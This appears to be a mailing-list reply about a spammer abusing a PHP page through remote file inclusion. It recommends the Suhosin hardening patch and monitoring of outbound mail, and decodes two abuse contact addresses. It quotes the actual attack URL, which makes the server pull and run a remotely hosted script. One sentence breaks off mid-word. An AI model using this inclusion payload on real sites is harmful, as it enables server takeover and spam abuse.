Mike Kellenberger wrote: [..]
The f*ing spammer found out about this and called the page with:
http://www.thestupidcustomer.xy/index.php?called_page_link=http://geocit ies.com/nimiuu/fuck.txt?
http://www.hardened-php.net/suhosin/index.html
"If you are not only running your own PHP scripts but are also hosting 3rd party PHP applications for yourself or even for possible customers, then you cannot trust the code quality of the PHP applications you use."
I suggest that you install that to safe yourself from a lot of problems. BTW: letting P
Debian: apt-get install php5-suhosin :)
Also apparently works on Windows.
Btw:
echo "<?php echo base64_decode('YWJ5bmVlZGFyZWFsb3ZlQHlhaG9vLmNvLnVrLHNoYXJuaW5hbUBsaXZlLmNvLnVr'); ?>" | php abyneedarealove@yahoo.co.uk,sharninam@live.co.uk
You might want to get those accounts shut down by contacting their abuse departments.
Next to all that, ratelimiting+alerting and monitoring outbound SMTP from sources you do not fully control is always a great idea.
Greets, Jeroen